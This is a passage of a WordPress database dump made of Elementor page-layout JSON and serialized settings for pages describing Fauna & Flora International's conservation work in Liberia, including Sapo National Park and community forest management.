humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20584,3004,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20587,3004,'_dp_original','1612'),(20588,3005,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20589,3005,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20590,3005,'slide_template','default'),(20591,3005,'slide_template','default'),(20594,3005,'_elementor_template_type','wp-post'),(20595,3005,'_elementor_template_type','wp-post'),(20596,3005,'_elementor_version','2.7.5'),(20597,3005,'_elementor_version','2.7.5'),(20598,3005,'_wp_page_template','default'),(20599,3005,'_wp_page_template','default'),(20600,3005,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20601,3005,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20604,3005,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20605,3005,'_thumbnail_id','3213'),(20607,3005,'_dp_original','1614'),(20608,3006,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20609,3006,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20610,3006,'slide_template','default'),(20611,3006,'slide_template','default'),(20614,3006,'_elementor_template_type','wp-post'),(20615,3006,'_elementor_template_type','wp-post'),(20616,3006,'_elementor_version','2.7.5'),(20617,3006,'_elementor_version','2.7.5'),(20618,3006,'_wp_page_template','default'),(20619,3006,'_wp_page_template','default'),(20620,3006,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 